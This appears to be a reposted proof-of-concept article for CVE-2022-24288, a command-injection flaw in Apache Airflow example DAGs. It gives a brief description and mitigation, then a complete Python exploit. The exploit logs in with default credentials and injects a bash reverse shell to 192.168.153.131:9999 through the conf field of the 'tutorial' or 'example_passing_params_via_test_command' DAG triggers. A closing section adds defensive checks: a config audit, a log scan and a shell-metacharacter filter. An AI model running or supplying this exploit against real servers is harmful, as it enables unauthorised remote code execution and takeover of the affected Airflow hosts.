CVE-2022-24288 Apache Airflow RCE POC/EXP
1. Description
In Apache Airflow versions prior to 2.2.4, some example DAGs did not properly sanitize user-provided parameters, making them vulnerable to OS command injection from the Web UI.
2. Mitigation:
This can be mitigated by ensuring that [core] load_examples is set to False.
3. EXP
(payload1 and payload2 are two different injection points; using either one is enough)
```python
import requests
import re
import random

# Local intercepting proxy used for the trigger requests
proxy = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080"
}


def dl(url, user, pwd):
    # Log in to the Airflow web UI and return the session cookie and CSRF token
    urls = url + '/login/?next=' + url + '/home'
    rep = requests.get(url)
    session = rep.headers['Set-Cookie'].split()[0].replace(';', '')
    csrf = re.findall(r"var csrfToken = '(.*?)'", rep.text)[0]
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/99.0.4844.84 Safari/537.36",
        "Cookie": session
    }
    data = {
        'csrf_token': csrf,
        'username': user,
        'password': pwd
    }
    reps = requests.post(urls, data=data, headers=headers)
    s1 = reps.headers['Set-Cookie'].split()[0].replace(';', '')
    c1 = re.findall(r"var csrfToken = '(.*?)'", reps.text)[0]
    return s1, c1


def payload1(urll, sess, csrf, cmd):
    # Injection point 1: the example_passing_params_via_test_command DAG
    urls = urll + '/trigger?dag_id=example_passing_params_via_test_command'
    code1 = random.randint(0, 60)
    # Randomise the seconds so each trigger gets a distinct execution_date
    dates = '2022-04-02 09:88:31+00:00'
    dates1 = dates.replace('88', str(code1))

    cmds = '{"foo":"\\";' + cmd + ';\\""}'
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
        "Accept": "text/html",
        "Cookie": sess,
    }
    print(dates1)

    data = {
        'csrf_token': csrf,
        'dag_id': 'example_passing_params_via_test_command',
        'origin': '/home',
        'execution_date': dates1,
        'conf': cmds,
        'unpause': 'on'
    }

    rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
    print(rep.status_code)


def payload2(urll, sess, csrf, cmd):
    # Injection point 2: the tutorial DAG
    urls = urll + '/trigger?dag_id=tutorial'
    code1 = random.randint(0, 60)
    dates = '2022-04-02 09:88:31+00:00'
    dates1 = dates.replace('88', str(code1))

    cmds = '{"my_param":"\\";' + cmd + ';\\""}'
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
        "Accept": "text/html",
        "Cookie": sess,
    }
    print(dates1)

    data = {
        'csrf_token': csrf,
        'dag_id': 'tutorial',
        'origin': '/home',
        'execution_date': dates1,
        'conf': cmds,
        'unpause': 'on'
    }

    rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
    print(rep.status_code)


if __name__ == '__main__':
    user = 'airflow'
    pwd = 'airflow'
    url = input("url __>:")
    #url = 'http://192.168.153.131:8080'
    cmd = 'bash -i >& /dev/tcp/192.168.153.131/9999 0>&1'
    s1, c1 = dl(url, user, pwd)
    print(f'Command __>: {cmd}')
    #payload1(url, s1, c1, cmd)
    payload2(url, s1, c1, cmd)
```
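As an added defensive example (not part of the original post or of Airflow itself), the checks below cover the mitigation in section 2 and the trigger endpoint the EXP uses: an audit of airflow.cfg for [core] load_examples, a scan of webserver access-log lines for POSTs to /trigger against the two example DAGs named above, and a DAG-side guard that rejects dag_run.conf values containing shell metacharacters. The config snippets and log lines are constructed, and the access-log format is assumed to be the common gunicorn-style line.

```python
import configparser
import json
import re
from typing import List

# Example DAG ids that the PoC above targets.
VULNERABLE_EXAMPLE_DAGS = {"example_passing_params_via_test_command", "tutorial"}

# Characters that let a templated conf value break out of a bash_command string.
SHELL_META = re.compile(r'[;&|`$"\'\\<>\n]')


def load_examples_disabled(cfg_text: str) -> bool:
    """True if airflow.cfg sets [core] load_examples = False (the documented mitigation)."""
    cp = configparser.ConfigParser()
    cp.read_string(cfg_text)
    # Airflow defaults load_examples to True, so a missing key counts as exposed.
    return not cp.getboolean("core", "load_examples", fallback=True)


def suspicious_trigger_requests(log_lines: List[str]) -> List[str]:
    """Return access-log lines that POST to /trigger for one of the example DAGs."""
    pat = re.compile(r'"POST /trigger\?dag_id=([A-Za-z0-9_]+)')
    hits = []
    for line in log_lines:
        m = pat.search(line)
        if m and m.group(1) in VULNERABLE_EXAMPLE_DAGS:
            hits.append(line)
    return hits


def conf_values_are_shell_safe(conf_json: str) -> bool:
    """DAG-side guard: accept only string conf values without shell metacharacters."""
    try:
        conf = json.loads(conf_json)
    except json.JSONDecodeError:
        return False
    return all(isinstance(v, str) and not SHELL_META.search(v) for v in conf.values())


# Constructed sample input (not taken from any real deployment).
EXPOSED_CFG = "[core]\nload_examples = True\n"
HARDENED_CFG = "[core]\nload_examples = False\n"
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Apr/2022:09:12:31 +0000] "POST /trigger?dag_id=tutorial HTTP/1.1" 302 -',
    '10.0.0.7 - - [02/Apr/2022:09:13:02 +0000] "GET /home HTTP/1.1" 200 -',
    '10.0.0.5 - - [02/Apr/2022:09:14:10 +0000] "POST /trigger?dag_id=my_etl HTTP/1.1" 302 -',
]
```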
This article is reposted from: 学新通技术网